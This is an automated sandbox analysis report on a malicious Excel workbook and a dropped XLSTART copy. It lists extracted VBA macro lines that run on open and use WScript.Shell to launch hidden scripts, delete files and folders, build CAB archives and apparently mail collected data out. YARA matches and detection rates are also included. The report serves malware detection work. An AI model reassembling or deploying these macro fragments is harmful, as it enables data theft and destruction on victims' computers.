Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://settings.outlook.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://staging.cortana.ai
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://tasks.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://webshell.suite.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://wus2.contentsync.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\k4.xls, type: DROPPEDMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: fWWE9vHC67.xlsStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : found possibly 'ADODB.Stream' functions open, read, write
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, found possibly 'ADODB.Stream' functions open, read, writeName: search_in_OL
Source: k4.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processes
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " WshShell.Run """ & "expand """ & " & Atta_xls & """ & " -F:" & AttName & ".xls E:\KK""" & ", 0, true"
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " WshShell.Run """ & "expand """ & " & Atta_xls & """ & " -F:" & AttName & ".xls E:\KK""" & ", 0, true"
Document contains an embedded VBA macro with suspicious strings
Source: fWWE9vHC67.xlsOLE, VBA macro line: FName = Environ("Temp") & "\" & ModuleName & ".bas"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: fWWE9vHC67.xlsOLE, VBA macro line: Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: fWWE9vHC67.xlsOLE, VBA macro line: Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: fWWE9vHC67.xlsOLE, VBA macro line: Set oWshell = CreateObject("WScript.Shell")
Source: fWWE9vHC67.xlsOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
Source: fWWE9vHC67.xlsOLE, VBA macro line: CreateFile "1", "D:\Collected_Address:frag1.txt"
Source: fWWE9vHC67.xlsOLE, VBA macro line: CreateFile "", "D:\Collected_Address:frag1.txt"
Source: fWWE9vHC67.xlsOLE, VBA macro line: CreateFile Now, "D:\Collected_Address:frag2.txt"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " Set wsh=createobject(""" & "wscript.shell""" & ")"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "wscript.quit"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "Set WshShell=WScript.CreateObject(""" & "WScript.Shell""" & ")"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "wscript.sleep 300000"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "WshSHell.Run (""" & "wscript.exe " & AddVbsFile_clear & """" & "), vbHide, False"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "WScript.Quit"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, " Set logfile = objFSO.CreateTextFile(log_path & """ & "\log.txt""" & ", True)"
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run ("wscript.exe " & AddVbsFile_search), vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "Set sh=WScript.CreateObject(""" & "shell.application""" & ")"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "Set WshShell = WScript.CreateObject(""" & "WScript.Shell""" & ")"
Source: fWWE9vHC67.xlsOLE, VBA macro line: Print #i, "WScript.Quit"
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c makecab /F """ & ThisWorkbook.Path & "\TEST.TXT""" & " /D COMPRESSIONTYPE=LZX /D COMPRESSIONMEMORY=21 /D CABINETNAMETEMPLATE=../" & AttName & ".CAB", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c RD /S /Q """ & ThisWorkbook.Path & "\disk1""", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\TEST.txt""", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.rpt""", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.inf""", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\sorce", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c MOVE /Y " & AttName & ".CAB E:\KK""", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\KK", vbHide, False
Source: fWWE9vHC67.xlsOLE, VBA macro line: Private Sub CreateFile(FragMark, pathf)
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function copymodule, String environ: FName = Environ("Temp") & "\" & ModuleName & ".bas"Name: copymodule
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function Microsofthobby, String environ: Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocusName: Microsofthobby
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function Microsofthobby, String environ: Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocusName: Microsofthobby
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function Microsofthobby, String environ: Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocusName: Microsofthobby
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function WReg, String wscript: Set oWshell = CreateObject("WScript.Shell")Name: WReg
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function ActionJudge, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: ActionJudge
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function ActionJudge, String createfile: CreateFile "1", "D:\Collected_Address:frag1.txt"Name: ActionJudge
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function ActionJudge, String createfile: CreateFile "", "D:\Collected_Address:frag1.txt"Name: ActionJudge
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function ActionJudge, String createfile: CreateFile Now, "D:\Collected_Address:frag2.txt"Name: ActionJudge
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, " Set wsh=createobject(""" & "wscript.shell""" & ")" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, " wscript.sleep 05" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, " wscript.sleep 05" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, " wscript.sleep 05" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, "wscript.quit" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, " wscript.sleep 05" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, "Set WshShell=WScript.CreateObject(""" & "WScript.Shell""" & ")" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, "wscript.sleep 300000" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, "WshSHell.Run (""" & "wscript.exe " & AddVbsFile_clear & """" & "), vbHide, False" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: Print # i, "WScript.Quit" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String createtextfile: Print # i, " Set logfile = objFSO.CreateTextFile(log_path & """ & "\log.txt""" & ", True)" Name: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function search_in_OL, String wscript: WshShell.Run ("wscript.exe " & AddVbsFile_search), vbHide, FalseName: search_in_OL
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String wscript: Print # i, "Set sh=WScript.CreateObject(""" & "shell.application""" & ")" Name: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String wscript: Print # i, "Set WshShell = WScript.CreateObject(""" & "WScript.Shell""" & ")" Name: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String wscript: Print # i, "WScript.Quit" Name: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c makecab /F """ & ThisWorkbook.Path & "\TEST.TXT""" & " /D COMPRESSIONTYPE=LZX /D COMPRESSIONMEMORY=21 /D CABINETNAMETEMPLATE=../" & AttName & ".CAB", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c RD /S /Q """ & ThisWorkbook.Path & "\disk1""", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\TEST.txt""", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.rpt""", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.inf""", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\sorce", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c MOVE /Y " & AttName & ".CAB E:\KK""", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreatCab_SendMail, String environ: WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\KK", vbHide, FalseName: CreatCab_SendMail
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function CreateFile, String createfile: Private Sub CreateFile(FragMark, pathf)Name: CreateFile
Source: k4.xls.0.drOLE, VBA macro line: Private jbxstatic_CreateFile_4017 As Boolean
Source: k4.xls.0.drOLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
Source: k4.xls.0.drOLE, VBA macro line: Static jbxtresh_Environ As Integer
Source: k4.xls.0.drOLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: k4.xls.0.drOLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
Source: k4.xls.0.drOLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: k4.xls.0.drOLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
Source: k4.xls.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
Source: k4.xls.0.drOLE, VBA macro line: FName = JbxHook_Environ_1_(116, "Temp") & "\" & ModuleName & ".bas"
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Shell_2_ 181, JbxHook_Environ_1_(181, "comspec") & " /c attrib -S -h """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Shell_2_ 182, JbxHook_Environ_1_(182, "comspec") & " /c Del /F /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Shell_2_ 183, JbxHook_Environ_1_(183, "comspec") & " /c RD /S /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Source: k4.xls.0.drOLE, VBA macro line: Set oWshell = JbxHook_CreateObject_1__set(219, "WScript.Shell")
Source: k4.xls.0.drOLE, VBA macro line: Set WshShell = JbxHook_CreateObject_1__set(274, "WScript.Shell")
Source: k4.xls.0.drOLE, VBA macro line: CreateFile "1", "D:\Collected_Address:frag1.txt"
Source: k4.xls.0.drOLE, VBA macro line: CreateFile "", "D:\Collected_Address:frag1.txt"
Source: k4.xls.0.drOLE, VBA macro line: CreateFile Now, "D:\Collected_Address:frag2.txt"
Source: k4.xls.0.drOLE, VBA macro line: Set WshShell = JbxHook_CreateObject_1__set(310, "WScript.Shell")
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " Set wsh=createobject(""" & "wscript.shell""" & ")"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "wscript.quit"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " wscript.sleep 05"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "Set WshShell=WScript.CreateObject(""" & "WScript.Shell""" & ")"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "wscript.sleep 300000"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "WshSHell.Run (""" & "wscript.exe " & AddVbsFile_clear & """" & "), vbHide, False"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "WScript.Quit"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, " Set logfile = objFSO.CreateTextFile(log_path & """ & "\log.txt""" & ", True)"
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 456, WshShell, ("wscript.exe " & AddVbsFile_search), vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: Set WshShell = JbxHook_CreateObject_1__set(465, "WScript.Shell")
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "Set sh=WScript.CreateObject(""" & "shell.application""" & ")"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "Set WshShell = WScript.CreateObject(""" & "WScript.Shell""" & ")"
Source: k4.xls.0.drOLE, VBA macro line: Print #i, "WScript.Quit"
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 537, WshShell, JbxHook_Environ_1_(537, "comspec") & " /c makecab /F """ & ThisWorkbook.Path & "\TEST.TXT""" & " /D COMPRESSIONTYPE=LZX /D COMPRESSIONMEMORY=21 /D CABINETNAMETEMPLATE=../" & AttName & ".CAB", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 545, WshShell, JbxHook_Environ_1_(545, "comspec") & " /c RD /S /Q """ & ThisWorkbook.Path & "\disk1""", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 546, WshShell, JbxHook_Environ_1_(546, "comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\TEST.txt""", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 547, WshShell, JbxHook_Environ_1_(547, "comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.rpt""", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 548, WshShell, JbxHook_Environ_1_(548, "comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.inf""", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 549, WshShell, JbxHook_Environ_1_(549, "comspec") & " /c RD /S /Q E:\sorce", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 552, WshShell, JbxHook_Environ_1_(552, "comspec") & " /c MOVE /Y " & AttName & ".CAB E:\KK""", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: JbxHook_Run_3__ob 556, WshShell, JbxHook_Environ_1_(556, "comspec") & " /c RD /S /Q E:\KK", vbHide, False
Source: k4.xls.0.drOLE, VBA macro line: Private Sub CreateFile(FragMark, pathf)
Source: k4.xls.0.drOLE, VBA macro line: If Not jbxstatic_CreateFile_4017 Then
Source: k4.xls.0.drOLE, VBA macro line: jbxstatic_CreateFile_4017 = JbxLog("function:CreateFile")
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function delete_this_wk, String ThisWorkbook
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: fWWE9vHC67.xlsStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : found possibly 'WScript.Shell' functions currentdirectory, appactivate, exec, regread, regwrite, run, sendkeys, environ
Source: k4.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : found possibly 'WScript.Shell' functions currentdirectory, appactivate, exec, regread, regwrite, run, sendkeys, environ
Source: C:\Users\user\AppData\Local\Temp\~DFB6A3757021F38DB9.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth (Nextron Systems), description = Detects suspicious VBA that writes to disk and is activated on document open, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\k4.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: fWWE9vHC67.xlsOLE, VBA macro line: Private Sub Workbook_open()
Source: fWWE9vHC67.xlsOLE, VBA macro line: Private Sub auto_open()
Source: fWWE9vHC67.xlsOLE, VBA macro line: .InsertLines 2, "Private Sub Workbook_open()"
Source: fWWE9vHC67.xlsOLE, VBA macro line: If Not if_outlook_open Then Exit Sub
Source: fWWE9vHC67.xlsOLE, VBA macro line: If Not if_outlook_open Then Exit Sub
Source: fWWE9vHC67.xlsOLE, VBA macro line: Private Function if_outlook_open() As Boolean
Source: fWWE9vHC67.xlsOLE, VBA macro line: if_outlook_open = False
Source: fWWE9vHC67.xlsOLE, VBA macro line: if_outlook_open = True
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_openName: Workbook_open
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function auto_openName: auto_open
Source: VBA code instrumentationOLE, VBA macro: Module ToDOLE, Function if_outlook_openName: if_outlook_open
Source: k4.xls.0.drOLE, VBA macro line: Private Sub Workbook_open()
Source: k4.xls.0.drOLE, VBA macro line: Private Sub auto_open()
Source: k4.xls.0.drOLE, VBA macro line: .InsertLines 2, "Private Sub Workbook_open()"
Source: k4.xls.0.drOLE, VBA macro line: If Not if_outlook_open Then
Source: k4.xls.0.drOLE, VBA macro line: If Not if_outlook_open Then
Source: k4.xls.0.drOLE, VBA macro line: Private Function if_outlook_open() As Boolean
Source: k4.xls.0.drOLE, VBA macro line: if_outlook_open = False
Source: k4.xls.0.drOLE, VBA macro line: if_outlook_open = True
Source: fWWE9vHC67.xlsOLE indicator, VBA macros: true
Source: k4.xls.0.drOLE indicator, VBA macros: true
Source: ~DFB6A3757021F38DB9.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: fWWE9vHC67.xlsReversingLabs: Detection: 82%
Source: fWWE9vHC67.xlsVirustotal: Detection: 74%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: fWWE9vHC67.xlsOLE indicator, Workbook stream: true
Source: k4.xls.0.drOLE indicator, Workbook stream: true
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: fWWE9vHC67.xls, k4.xls.0.dr, ~DFB6A3757021F38DB9.TMP.0.drBinary or memory string: wb.VBProject.References.AddFromGuid _
Source: ~DFB6A3757021F38DB9.TMP.0.drBinary or memory string: ,wb.VBPr
Source: fWWE9vHC67.xls, ~DFB6A3757021F38DB9.TMP.0.drBinary or memory string: %wb.VBProject.References.AddFromGuid _C@P
Source: k4.xls.0.drBinary or memory string: wb.VBProject.References.AddFromG uid _
Source: k4.xls.0.drBinary or memory string: %wb.VBProject.References.AddFromGuid _C@
Source: fWWE9vHC67.xlsBinary or memory string: Jwb.VBProject.References.AddFromGuid _
Source: k4.xls.0.drBinary or memory string: wb.VBPro
